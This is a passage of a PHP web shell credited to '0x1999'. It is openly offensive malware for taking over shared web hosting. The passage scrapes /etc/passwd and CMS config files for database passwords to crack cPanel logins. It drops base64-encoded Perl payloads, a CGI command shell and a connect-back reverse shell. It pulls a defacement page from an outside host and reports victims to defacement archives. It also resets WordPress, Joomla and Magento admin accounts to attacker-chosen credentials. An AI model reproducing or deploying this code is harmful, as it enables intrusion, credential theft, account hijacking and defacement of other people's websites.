  828.         if(@mysql_connect('localhost', $ucp, $pcp)) {
  829.           if($_SESSION[$ucp] && $_SESSION[$pcp]) {
  830.           } else {
  831.             $_SESSION[$ucp] = "1";
  832.             $_SESSION[$pcp] = "1";
  833.             $i++;
  834.             echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
  835.           }
  836.         }
  837.       }
  838.       session_unset();
  839.       session_destroy();
  840.     }
  841.     if($i == 0) {
  842.     } else {
  843.       echo "<br>Nemu ".$i." Cpanel by <font color=lime>0x1999</font>";
  844.     }
  845.   } else {
  846.     echo "<center>
  847.    <form method='post'>
  848.    USER: <br>
  849.    <textarea style='width: 450px; height: 150px;' name='user_cp'>";
  850.     $_usercp = fopen("/etc/passwd","r");
  851.     while($getu = fgets($_usercp)) {
  852.       if($getu == '' || !$_usercp) {
  853.         echo "<font color=red>Can't read /etc/passwd</font>";
  854.       } else {
  855.         preg_match_all("/(.*?):x:/", $getu, $u);
  856.         foreach($u[1] as $user_cp) {
  857.             if(is_dir("/home/$user_cp/public_html")) {
  858.               echo "$user_cp\n";
  859.           }
  860.         }
  861.       }
  862.     }
  863.     echo "</textarea><br>
  864.    PASS: <br>
  865.    <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
  866.     function cp_pass($dir) {
  867.       $pass = "";
  868.       $dira = scandir($dir);
  869.       foreach($dira as $dirb) {
  870.         if(!is_file("$dir/$dirb")) continue;
  871.         $ambil = file_get_contents("$dir/$dirb");
  872.         if(preg_match("/WordPress/", $ambil)) {
  873.           $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
  874.         } elseif(preg_match("/JConfig|joomla/", $ambil)) {
  875.           $pass .= ambilkata($ambil,"password = '","'")."\n";
  876.         }
  877.  
  878.          elseif(preg_match("/konekDB/", $ambil)) {
  879.           $pass .= ambilkata($ambil,"$password = '","'")."\n";
  880.         }
  881.  
  882.          elseif(preg_match("/cmsmember/", $ambil)) {
  883.           $pass .= ambilkata($ambil,'dbpasswd = "','"')."\n";
  884.         } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
  885.           $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
  886.         } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
  887.           $pass .= ambilkata($ambil,'password = "','"')."\n";
  888.         } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
  889.           $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
  890.         } elseif(preg_match("/client/", $ambil)) {
  891.           preg_match("/password=(.*)/", $ambil, $pass1);
  892.           if(preg_match('/"/', $pass1[1])) {
  893.             $pass1[1] = str_replace('"', "", $pass1[1]);
  894.             $pass .= $pass1[1]."\n";
  895.           }
  896.         } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
  897.           $pass .= ambilkata($ambil,"db_password = '","'")."\n";
  898.         }
  899.       }
  900.       echo $pass;
  901.     }
  902.     $cp_pass = cp_pass($dir);
  903.     echo $cp_pass;
  904.     echo "</textarea><br>
  905.    <input type='submit' name='crack' style='width: 450px;' value='Crack'>
  906.    </form>
  907.    <br></center>";
  908.   }
  909. }elseif(isset($_GET['do']) && ($_GET['do'] == 'cgi')) {
  910.     echo "<center/><br/><b><font color=blue>+--==[ cgitelnet.v1  Bypass Exploit]==--+ </font></b><br><br>";
  911.  mkdir('cgitelnet1', 0755);
  912.     chdir('cgitelnet1');      
  913.         $kokdosya = ".htaccess";
  914.         $dosya_adi = "$kokdosya";
  915.         $dosya = fopen ($dosya_adi , 'w') or die ("Dosya a&#231;&#305;lamad&#305;!");
  916.         $metin = "Options FollowSymLinks MultiViews Indexes ExecCGI
  917.  
  918. AddType application/x-httpd-cgi .cin
  919.  
  920. AddHandler cgi-script .cin
  921. AddHandler cgi-script .cin";    
  922.         fwrite ( $dosya , $metin ) ;
  923.         fclose ($dosya);
  924. $cgishellizocin = 'IyEvdXNyL2Jpbi9wZXJsCiMgQ29weXJpZ2h0IChDKSAyMDAxIFJvaGl0YWIgQmF0cmEKIyBSZWNvZGVkIEJ5IDB4MTk5OQoKJFdpbk5UID0gMDsKJE5UQ21kU2VwID0gIiYiOwokVW5peENtZFNlcCA9ICI7IjsKJENvbW1hbmRUaW1lb3V0RHVyYXRpb24gPSAxMDsKJFNob3dEeW5hbWljT3V0cHV0ID0gMTsKJENtZFNlcCA9ICgkV2luTlQgPyAkTlRDbWRTZXAgOiAkVW5peENtZFNlcCk7CiRDbWRQd2QgPSAoJFdpbk5UID8gImNkIiA6ICJwd2QiKTsKJFBhdGhTZXAgPSAoJFdpbk5UID8gIlxcIiA6ICIvIik7CiRSZWRpcmVjdG9yID0gKCRXaW5OVCA/ICIgMj4mMSAxPiYyIiA6ICIgMT4mMSAyPiYxIik7CnN1YiBSZWFkUGFyc2UgCnsKCWxvY2FsICgqaW4pID0gQF8gaWYgQF87Cglsb2NhbCAoJGksICRsb2MsICRrZXksICR2YWwpOwoJCgkkTXVsdGlwYXJ0Rm9ybURhdGEgPSAkRU5WeydDT05URU5UX1RZUEUnfSA9fiAvbXVsdGlwYXJ0XC9mb3JtLWRhdGE7IGJvdW5kYXJ5PSguKykkLzsKCglpZigkRU5WeydSRVFVRVNUX01FVEhPRCd9IGVxICJHRVQiKQoJewoJCSRpbiA9ICRFTlZ7J1FVRVJZX1NUUklORyd9OwoJfQoJZWxzaWYoJEVOVnsnUkVRVUVTVF9NRVRIT0QnfSBlcSAiUE9TVCIpCgl7CgkJYmlubW9kZShTVERJTikgaWYgJE11bHRpcGFydEZvcm1EYXRhICYgJFdpbk5UOwoJCXJlYWQoU1RESU4sICRpbiwgJEVOVnsnQ09OVEVOVF9MRU5HVEgnfSk7Cgl9CgoJIyBoYW5kbGUgZmlsZSB1cGxvYWQgZGF0YQoJaWYoJEVOVnsnQ09OVEVOVF9UWVBFJ30gPX4gL211bHRpcGFydFwvZm9ybS1kYXRhOyBib3VuZGFyeT0oLispJC8pCgl7CgkJJEJvdW5kYXJ5ID0gJy0tJy4kMTsgIyBwbGVhc2UgcmVmZXIgdG8gUkZDMTg2NyAKCQlAbGlzdCA9IHNwbGl0KC8kQm91bmRhcnkvLCAkaW4pOyAKCQkkSGVhZGVyQm9keSA9ICRsaXN0WzFdOwoJCSRIZWFkZXJCb2R5ID1+IC9cclxuXHJcbnxcblxuLzsKCQkkSGVhZGVyID0gJGA7CgkJJEJvZHkgPSAkJzsKIAkJJEJvZHkgPX4gcy9cclxuJC8vOyAjIHRoZSBsYXN0IFxyXG4gd2FzIHB1dCBpbiBieSBOZXRzY2FwZQoJCSRpbnsnZmlsZWRhdGEnfSA9ICRCb2R5OwoJCSRIZWFkZXIgPX4gL2ZpbGVuYW1lPVwiKC4rKVwiLzsgCgkJJGlueydmJ30gPSAkMTsgCgkJJGlueydmJ30gPX4gcy9cIi8vZzsKCQkkaW57J2YnfSA9fiBzL1xzLy9nOwoKCQkjIHBhcnNlIHRyYWlsZXIKCQlmb3IoJGk9MjsgJGxpc3RbJGldOyAkaSsrKQoJCXsgCgkJCSRsaXN0WyRpXSA9fiBzL14uK25hbWU9JC8vOwoJCQkkbGlzdFskaV0gPX4gL1wiKFx3KylcIi87CgkJCSRrZXkgPSAkMTsKCQkJJHZhbCA9ICQnOwoJCQkkdmFsID1+IHMvKF4oXHJcblxyXG58XG5cbikpfChcclxuJHxcbiQpLy9nOwoJCQkkdmFsID1+IHMvJSguLikvcGFjaygiYyIsIGhleCgkMSkpL2dlOwoJCQkkaW57JGtleX0gPSAkdmFsOyAKCQl9Cgl9CgllbHNlICMgc3RhbmRhcmQgcG9zdCBkYXRhICh1cmwgZW5jb2RlZCwgbm90IG11bHRpcGFydCkKCXsKCQlAaW4gPSBzcGxpdCgvJi8sICRpbik7CgkJZm9yZWFjaCAkaSAoMCAuLiAkI2luKQoJCXsKCQkJJGluWyRpXSA9fiBzL1wrLyAvZzsKCQkJKCRrZXksICR2YWwpID0gc3BsaXQoLz0vLCAkaW5bJGldLCAyKTsKCQkJJGtleSA9fiBzLyUoLi4pL3BhY2soImMiLCBoZXgoJDEpKS9nZTsKCQkJJHZhbCA9fiBzLyUoLi4pL3BhY2soImMiLCBoZXgoJDEpKS9nZTsKCQkJJGlueyRrZXl9IC49ICJcMCIgaWYgKGRlZmluZWQoJGlueyRrZXl9KSk7CgkJCSRpbnska2V5fSAuPSAkdmFsOwoJCX0KCX0KfQpzdWIgUHJpbnRQYWdlSGVhZGVyCnsKCSRFbmNvZGVkQ3VycmVudERpciA9ICRDdXJyZW50RGlyOwoJJEVuY29kZWRDdXJyZW50RGlyID1+IHMvKFteYS16QS1aMC05XSkvJyUnLnVucGFjaygiSCoiLCQxKS9lZzsKCXByaW50ICJDb250ZW50LXR5cGU6IHRleHQvaHRtbFxuXG4iOwoJcHJpbnQgPDxFTkQ7CjxodG1sPgo8aGVhZD4KPHRpdGxlPkNHSS1UZWxuZXQgVmVyc2lvbiAxLjA8L3RpdGxlPgokSHRtbE1ldGFIZWFkZXIKPC9oZWFkPgo8Ym9keSBvbkxvYWQ9ImRvY3VtZW50LmYuQF8uZm9jdXMoKSIgYmdjb2xvcj0iIzBBMEEwQSIgdG9wbWFyZ2luPSIwIiBsZWZ0bWFyZ2luPSIwIiBtYXJnaW53aWR0aD0iMCIgbWFyZ2luaGVpZ2h0PSIwIj4KPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9dXBsb2FkJmQ9JEVuY29kZWRDdXJyZW50RGlyIj5VcGxvYWQgRmlsZTwvYT4gfCAKPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9ZG93bmxvYWQmZD0kRW5jb2RlZEN1cnJlbnREaXIiPkRvd25sb2FkIEZpbGU8L2E+IHwKPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9bG9nb3V0Ij5EaXNjb25uZWN0PC9hPiB8CjxhIGhyZWY9Imh0dHA6Ly93d3cucm9oaXRhYi5jb20vY2dpc2NyaXB0cy9jZ2l0ZWxuZXQuaHRtbCI+SGVscDwvYT48YnI+Cjxmb250IGNvbG9yPSIjQzBDMEMwIiBzaXplPSIzIj4KRU5ECn0Kc3ViIFByaW50UGFnZUZvb3Rlcgp7CglwcmludCAiPC9mb250PjwvYm9keT48L2h0bWw+IjsKfQpzdWIgR2V0Q29va2llcwp7CglAaHR0cGNvb2tpZXMgPSBzcGxpdCgvOyAvLCRFTlZ7J0hUVFBfQ09PS0lFJ30pOwoJZm9yZWFjaCAkY29va2llKEBodHRwY29va2llcykKCXsKCQkoJGlkLCAkdmFsKSA9IHNwbGl0KC89LywgJGNvb2tpZSk7CgkJJENvb2tpZXN7JGlkfSA9ICR2YWw7Cgl9Cn0Kc3ViIFByaW50Q29tbWFuZExpbmVJbnB1dEZvcm0KewoJJFByb21wdCA9ICRXaW5OVCA/ICIkQ3VycmVudERpcj4gIiA6ICJbYWRtaW5cQCRTZXJ2ZXJOYW1lICRDdXJyZW50RGlyXVwkICI7CglwcmludCA8PEVORDsKPGNvZGU+Cjxmb3JtIG5hbWU9ImYiIG1ldGhvZD0iUE9TVCIgYWN0aW9uPSIkU2NyaXB0TG9jYXRpb24iPgo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJhIiB2YWx1ZT0iY29tbWFuZCI+CjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImQiIHZhbHVlPSIkQ3VycmVudERpciI+CiRQcm9tcHQKPGlucHV0IHR5cGU9InRleHQiIG5hbWU9ImMiPgo8aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0iRW50ZXIiPgo8L2Zvcm0+CjwvY29kZT4KRU5ECn0Kc3ViIENvbW1hbmRUaW1lb3V0CnsKCWlmKCEkV2luTlQpCgl7CgkJYWxhcm0oMCk7CgkJcHJpbnQgPDxFTkQ7CjwveG1wPgo8Y29kZT4KQ29tbWFuZCBleGNlZWRlZCBtYXhpbXVtIHRpbWUgb2YgJENvbW1hbmRUaW1lb3V0RHVyYXRpb24gc2Vjb25kKHMpLgo8YnI+S2lsbGVkIGl0IQo8Y29kZT4KRU5ECgkJJlByaW50Q29tbWFuZExpbmVJbnB1dEZvcm07CgkJJlByaW50UGFnZUZvb3RlcjsKCQlleGl0OwoJfQp9CnN1YiBFeGVjdXRlQ29tbWFuZAp7CglpZigkUnVuQ29tbWFuZCA9fiBtL15ccypjZFxzKyguKykvKSAjIGl0IGlzIGEgY2hhbmdlIGRpciBjb21tYW5kCgl7CgkJIyB3ZSBjaGFuZ2UgdGhlIGRpcmVjdG9yeSBpbnRlcm5hbGx5LiBUaGUgb3V0cHV0IG9mIHRoZQoJCSMgY29tbWFuZCBpcyBub3QgZGlzcGxheWVkLgoJCQoJCSRPbGREaXIgPSAkQ3VycmVudERpcjsKCQkkQ29tbWFuZCA9ICJjZCBcIiRDdXJyZW50RGlyXCIiLiRDbWRTZXAuImNkICQxIi4kQ21kU2VwLiRDbWRQd2Q7CgkJY2hvcCgkQ3VycmVudERpciA9IGAkQ29tbWFuZGApOwoJCSZQcmludFBhZ2VIZWFkZXIoImMiKTsKCQkkUHJvbXB0ID0gJFdpbk5UID8gIiRPbGREaXI+ICIgOiAiW2FkbWluXEAkU2VydmVyTmFtZSAkT2xkRGlyXVwkICI7CgkJcHJpbnQgIjxjb2RlPiRQcm9tcHQgJFJ1bkNvbW1hbmQ8L2NvZGU+IjsKCX0KCWVsc2UgIyBzb21lIG90aGVyIGNvbW1hbmQsIGRpc3BsYXkgdGhlIG91dHB1dAoJewoJCSZQcmludFBhZ2VIZWFkZXIoImMiKTsKCQkkUHJvbXB0ID0gJFdpbk5UID8gIiRDdXJyZW50RGlyPiAiIDogIlthZG1pblxAJFNlcnZlck5hbWUgJEN1cnJlbnREaXJdXCQgIjsKCQlwcmludCAiPGNvZGU+JFByb21wdCAkUnVuQ29tbWFuZDwvY29kZT48eG1wPiI7CgkJJENvbW1hbmQgPSAiY2QgXCIkQ3VycmVudERpclwiIi4kQ21kU2VwLiRSdW5Db21tYW5kLiRSZWRpcmVjdG9yOwoJCWlmKCEkV2luTlQpCgkJewoJCQkkU0lHeydBTFJNJ30gPSBcJkNvbW1hbmRUaW1lb3V0OwoJCQlhbGFybSgkQ29tbWFuZFRpbWVvdXREdXJhdGlvbik7CgkJfQoJCWlmKCRTaG93RHluYW1pY091dHB1dCkgIyBzaG93IG91dHB1dCBhcyBpdCBpcyBnZW5lcmF0ZWQKCQl7CgkJCSR8PTE7CgkJCSRDb21tYW5kIC49ICIgfCI7CgkJCW9wZW4oQ29tbWFuZE91dHB1dCwgJENvbW1hbmQpOwoJCQl3aGlsZSg8Q29tbWFuZE91dHB1dD4pCgkJCXsKCQkJCSRfID1+IHMvKFxufFxyXG4pJC8vOwoJCQkJcHJpbnQgIiRfXG4iOwoJCQl9CgkJCSR8PTA7CgkJfQoJCWVsc2UgIyBzaG93IG91dHB1dCBhZnRlciBjb21tYW5kIGNvbXBsZXRlcwoJCXsKCQkJcHJpbnQgYCRDb21tYW5kYDsKCQl9CgkJaWYoISRXaW5OVCkKCQl7CgkJCWFsYXJtKDApOwoJCX0KCQlwcmludCAiPC94bXA+IjsKCX0KCSZQcmludENvbW1hbmRMaW5lSW5wdXRGb3JtOwoJJlByaW50UGFnZUZvb3RlcjsKfQomUmVhZFBhcnNlOwomR2V0Q29va2llczsKJFNjcmlwdExvY2F0aW9uID0gJEVOVnsnU0NSSVBUX05BTUUnfTsKJFNlcnZlck5hbWUgPSAkRU5WeydTRVJWRVJfTkFNRSd9OwoKJFJ1bkNvbW1hbmQgPSAkaW57J2MnfTsKJFRyYW5zZmVyRmlsZSA9ICRpbnsnZid9OwokT3B0aW9ucyA9ICRpbnsnbyd9OwokQWN0aW9uID0gJGlueydhJ307CiRBY3Rpb24gPSAiY29tbWFuZCIgaWYoJEFjdGlvbiBlcSAiIik7CiRDdXJyZW50RGlyID0gJGlueydkJ307CmNob3AoJEN1cnJlbnREaXIgPSBgJENtZFB3ZGApIGlmKCRDdXJyZW50RGlyIGVxICIiKTsKaWYoJEFjdGlvbiBlcSAiY29tbWFuZCIpICMgdXNlciB3YW50cyB0byBydW4gYSBjb21tYW5kCnsKCSZFeGVjdXRlQ29tbWFuZDsKfQo=';
  925.  
  926. $file = fopen("izo.cin" ,"w+");
  927. $write = fwrite ($file ,base64_decode($cgishellizocin));
  928. fclose($file);
  929.     chmod("izo.cin",0755);
  930. $netcatshell = 'IyEvdXNyL2Jpbi9wZXJsDQogICAgICB1c2UgU29ja2V0Ow0KICAgICAgcHJpbnQgIkRhdGEgQ2hh
  931. MHMgQ29ubmVjdCBCYWNrIEJhY2tkb29yXG5cbiI7DQogICAgICBpZiAoISRBUkdWWzBdKSB7DQog
  932. ICAgICAgIHByaW50ZiAiVXNhZ2U6ICQwIFtIb3N0XSA8UG9ydD5cbiI7DQogICAgICAgIGV4aXQo
  933. MSk7DQogICAgICB9DQogICAgICBwcmludCAiWypdIER1bXBpbmcgQXJndW1lbnRzXG4iOw0KICAg
  934. ICAgJGhvc3QgPSAkQVJHVlswXTsNCiAgICAgICRwb3J0ID0gODA7DQogICAgICBpZiAoJEFSR1Zb
  935. MV0pIHsNCiAgICAgICAgJHBvcnQgPSAkQVJHVlsxXTsNCiAgICAgIH0NCiAgICAgIHByaW50ICJb
  936. Kl0gQ29ubmVjdGluZy4uLlxuIjsNCiAgICAgICRwcm90byA9IGdldHByb3RvYnluYW1lKCd0Y3An
  937. KSB8fCBkaWUoIlVua25vd24gUHJvdG9jb2xcbiIpOw0KICAgICAgc29ja2V0KFNFUlZFUiwgUEZf
  938. SU5FVCwgU09DS19TVFJFQU0sICRwcm90bykgfHwgZGllICgiU29ja2V0IEVycm9yXG4iKTsNCiAg
  939. ICAgIG15ICR0YXJnZXQgPSBpbmV0X2F0b24oJGhvc3QpOw0KICAgICAgaWYgKCFjb25uZWN0KFNF
  940. UlZFUiwgcGFjayAiU25BNHg4IiwgMiwgJHBvcnQsICR0YXJnZXQpKSB7DQogICAgICAgIGRpZSgi
  941. VW5hYmxlIHRvIENvbm5lY3RcbiIpOw0KICAgICAgfQ0KICAgICAgcHJpbnQgIlsqXSBTcGF3bmlu
  942. ZyBTaGVsbFxuIjsNCiAgICAgIGlmICghZm9yayggKSkgew0KICAgICAgICBvcGVuKFNURElOLCI+
  943. JlNFUlZFUiIpOw0KICAgICAgICBvcGVuKFNURE9VVCwiPiZTRVJWRVIiKTsNCiAgICAgICAgb3Bl
  944. bihTVERFUlIsIj4mU0VSVkVSIik7DQogICAgICAgIGV4ZWMgeycvYmluL3NoJ30gJy1iYXNoJyAu
  945. ICJcMCIgeCA0Ow0KICAgICAgICBleGl0KDApOw0KICAgICAgfQ0KICAgICAgcHJpbnQgIlsqXSBE
  946. YXRhY2hlZFxuXG4iOw==';
  947.  
  948. $file = fopen("dc.pl" ,"w+");
  949. $write = fwrite ($file ,base64_decode($netcatshell));
  950. fclose($file);
  951.     chmod("dc.pl",0755);
  952.    echo "<iframe src=cgitelnet1/izo.cin width=100% height=100% frameborder=0></iframe>
  953.  
  954.  
  955. </div>";
  956.    
  957.    
  958. }
  959.  
  960. elseif(isset($_GET['do']) && ($_GET['do'] == 'deleteme')) {
  961.     unlink(__FILE__);
  962.     echo "<script>window.location='./';</script>";
  963.     }
  964.     elseif(isset($_GET['do']) && ($_GET['do'] == 'mirror')) {
  965.     if($_POST['arsip'] == '1') {
  966.         $domain = explode("\r\n", $_POST['url']);
  967.         $nick =  $_POST['nick'];
  968.         echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
  969.         echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
  970.         function zoneh($url,$nick) {
  971.             $ch = curl_init("http://www.zone-h.com/notify/single");
  972.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  973.                   curl_setopt($ch, CURLOPT_POST, true);
  974.                   curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
  975.             return curl_exec($ch);
  976.                   curl_close($ch);
  977.         }
  978.         foreach($domain as $url) {
  979.             $zoneh = zoneh($url,$nick);
  980.             if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
  981.                 echo "$url -> <font color=lime>OK</font><br>";
  982.             } else {
  983.                 echo "$url -> <font color=red>ERROR</font><br>";
  984.             }
  985.         }
  986.     } if($_POST['arsip'] == '2') {
  987.         $site = explode("\r\n", $_POST['sites']);
  988. $hekel = $_POST['nick'];
  989. $tim = $_POST['tim'];
  990. foreach($site as $sites) {
  991. $zh = $sites;
  992. $form_url = "https://www.defacer.id/notify";
  993. $data_to_post = array();
  994. $data_to_post['attacker'] = "$hekel";
  995. $data_to_post['team'] = "$tim";
  996. $data_to_post['poc'] = 'SQL Injection';
  997. $data_to_post['url'] = "$zh";
  998. $curl = curl_init();
  999. curl_setopt($curl,CURLOPT_URL, $form_url);
  1000. curl_setopt($curl,CURLOPT_POST, sizeof($data_to_post));
  1001. curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"); //msnbot/1.0 (+http://search.msn.com/msnbot.htm)
  1002. curl_setopt($curl,CURLOPT_POSTFIELDS, $data_to_post);
  1003. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  1004. curl_setopt($curl, CURLOPT_REFERER, 'https://defacer.id/notify.html');
  1005. $result = curl_exec($curl);
  1006. echo $result;
  1007. curl_close($curl);
  1008. echo "<br>";
  1009. }
  1010.  
  1011.     }
  1012.     else {
  1013.         echo "
  1014.         <script type='text/javascript'>//<![CDATA[
  1015. window.onload=function(){
  1016. document.getElementById('arsip').addEventListener('change', function () {
  1017.     var style = this.value == 2 ? 'block' : 'none';
  1018.    document.getElementById('defacerid').style.display = style;
  1019. });
  1020. }//]]>
  1021.  
  1022. </script><center>
  1023.         <form method='post'>
  1024.        <select class='select' id='arsip' name='arsip' style='width: 450px;' height='10'>
  1025.        <option value='1'>Zone-h</option>
  1026.        <option value='2'>Defacer ID</option></select><br>
  1027.         <u>Defacer</u>: <br>
  1028.        <input type='text' name='nick' size='50' value='0x1999'><br>
  1029. <div id='defacerid' style='display: none;'><br>
  1030. <u>Team</u>:<br>
  1031.        <input type='text' name='tim' size='50' value='Indonesian Code Party'><br><br>
  1032.         </div>
  1033.        <u>Domains</u>: <br>
  1034.        <textarea style='width: 450px; height: 150px;' name='url'></textarea><br>
  1035.        <input type='submit' name='submit' value='Submit' style='width: 450px;'>
  1036.        </form>";
  1037.     }
  1038.     echo "</center>";
  1039. }
  1040.  
  1041. elseif(isset($_GET['do']) && ($_GET['do'] == 'hek')) {
  1042.     $url="http://" . $_SERVER['SERVER_NAME']."/0x.htm";
  1043. $hh=$_SERVER['DOCUMENT_ROOT']."/9x.htm";
  1044. @file_put_contents($hh ,file_get_contents("http://riza-andriani.me/jatim.txt"));
  1045. function zoneh($url,$nick) {
  1046.             $ch = curl_init("http://www.zone-h.com/notify/single");
  1047.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  1048.                   curl_setopt($ch, CURLOPT_POST, true);
  1049.                   curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
  1050.             return curl_exec($ch);
  1051.                   curl_close($ch);
  1052.         }
  1053.             $zoneh = zoneh($url,"0x1999");
  1054.             if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
  1055.                 echo "$url -> <font color=lime>OK</font><br>";
  1056.             } else {
  1057.                 echo "$url -> <font color=red>ERROR</font><br>";
  1058.             }
  1059. }
  1060. elseif(isset($_GET['do']) && ($_GET['do'] == 'crp')) {
  1061.   if($_POST['gass']) {
  1062.     echo "<center><h1>Config Reset Password</h1>
  1063.    <form method='post'>
  1064.    Link Config: <br>
  1065.    <textarea name='link' style='width: 450px; height:250px;'>";
  1066.     UrlLoop($_POST['linkconf'],$_POST['tipe']);
  1067.     echo"</textarea><br>
  1068.    <input type='submit' style='width: 450px;' name='ngentuconfig' value='Hajar!!'>
  1069.    </form></center>";
  1070.   }else {
  1071.     echo '<center>
  1072.    <h1>Config Reset Password</h1>
  1073.    <form method="post">
  1074.    Select Type :<br><select class="select" name="tipe"  style="width: 450px;" height="10">
  1075.    <option value="Wordpress">Wordpress</option>
  1076.    <option value="Joomla">Joomla</option>
  1077.    <option value="Lokomedia">Lokomedia</option>
  1078.    <option value="Magento">Magento</option>
  1079.    <option value="OpenCart">OpenCart</option>
  1080.    <option value="txt">All Config</option>
  1081.    </select><br>
  1082.    Link Config :<br>
  1083.    <input type="text" name="linkconf" height="10" style="width: 450px;" placeholder="http://0xdark.com/cox_symconf/"><br>
  1084.    <input type="submit" style="width: 450px;" name="gass" value="Hajar!!">
  1085.    </form></center>';
  1086.   }
  1087.   if($_POST['ngentuconfig']) {
  1088.     echo "<center><table style='width:100%'>
  1089.  <tr>
  1090.    <th>CMS</th>
  1091.    <th>User</th>
  1092.    <th>Password</th>
  1093.    <th>Login</th>
  1094.    <th>Config</th>
  1095.  </tr>";
  1096.     $user = '0x1999';
  1097.     $pass = "0x1999";
  1098.     $passx = md5($pass);
  1099.     $link = explode("\r\n", $_POST['link']);
  1100.  
  1101.     foreach($link as $file_conf) {
  1102.       $config = file_get_contents($file_conf);
  1103.       if(preg_match("/JConfig|joomla/",$config)) {
  1104.         $dbhost = ambilkata($config,"host = '","'");
  1105.         $dbuser = ambilkata($config,"user = '","'");
  1106.         $dbpass = ambilkata($config,"password = '","'");
  1107.         $dbname = ambilkata($config,"db = '","'");
  1108.         $dbprefix = ambilkata($config,"dbprefix = '","'");
  1109.         $prefix = $dbprefix."users";
  1110.         $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1111.         $db = mysql_select_db($dbname);
  1112.         $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  1113.         $result = mysql_fetch_array($q);
  1114.         $id = $result['id'];
  1115.         $site = ambilkata($config,"sitename = '","'");
  1116.         $update = mysql_query("UPDATE $prefix SET username='$user',password='$passx' WHERE id='$id'");
  1117.         echo "<tr><td>Joomla</td>";
  1118.         //echo "[ ".$file_conf." ]<br>";
  1119.         //echo "CMS => Joomla<br>";
  1120.         if($site == '') {
  1121.           $url_target = "<font color=red>ERROR</font><br>";
  1122.         } else {
  1123.           $url_target=$site;
  1124.         }
  1125.         if(!$update) {
  1126.         echo "<td><font color=red>".mysql_error()."</font></td><td>Update Error</td><td>!</td><td>".$file_conf."</td>";
  1127.         }
  1128.         elseif(!$conn){
  1129.         echo "<td><font color=red>".mysql_error()."</font></td><td>Connection Error</td><td>!</td><td>".$file_conf."</td>";
  1130.         }
  1131.         elseif (!$db){
  1132.         echo "<td><font color=red>".mysql_error()."</font></td><td>DB Error</td><td>!</td><td>".$file_conf."</td>";
  1133.         }
  1134.          else {
  1135.           echo "<td><font color=lime>$user</font></td>";
  1136.           echo "<td><font color=lime>$pass</font></td>";
  1137.           echo "<td><a href=\"https://www.google.com/search?source=hp&q='$url_target'\" target=\"_BLANK\">$url_target</a></td>";
  1138.           echo "<td>".$file_conf."</td>";
  1139.         }
  1140.         echo "</tr>";
  1141.         mysql_close($conn);
  1142.       } elseif(preg_match("/WordPress/",$config)) {
  1143.         $dbhost = ambilkata($config,"DB_HOST', '","'");
  1144.         $dbuser = ambilkata($config,"DB_USER', '","'");
  1145.         $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  1146.         $dbname = ambilkata($config,"DB_NAME', '","'");
  1147.         $dbprefix = ambilkata($config,"table_prefix  = '","'");
  1148.         $prefix = $dbprefix."users";
  1149.         $option = $dbprefix."options";
  1150.         $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1151.         $db = mysql_select_db($dbname);
  1152.         $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  1153.         $result = mysql_fetch_array($q);
  1154.         $id = $result[ID];
  1155.         $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  1156.         $result2 = mysql_fetch_array($q2);
  1157.         $target = $result2[option_value];
  1158.         if($target == '') {
  1159.           $url_target = "<font color=red>DOMAIN ERROR</font>";
  1160.         } else {
  1161.           $url_target = "<a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a>";
  1162.         }
  1163.         $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE id='$id'");
  1164.         echo "<tr><td>Wordpress</td>";
  1165.         //echo "[ ".$file_conf." ]<br>";
  1166.         //echo $url_target;
  1167.         if(!$update OR !$conn OR !$db) {
  1168.           echo "<td><font color=red>".mysql_error()."</font></td><td>!</td><td>!</td><td>".$file_conf."</td>";
  1169.         } else {
  1170.           echo "<td><font color=lime>$user</font></td>";
  1171.           echo "<td><font color=lime>$pass</font></td>";
  1172.           echo "<td>$url_target</td>";
  1173.           echo "<td>".$file_conf."</td>";
  1174.         }
  1175.         echo "</tr>";
  1176.         mysql_close($conn);
  1177.       } elseif(preg_match("/Magento|Mage_Core/",$config)) {
  1178.         $dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
  1179.         $dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
  1180.         $dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
  1181.         $dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
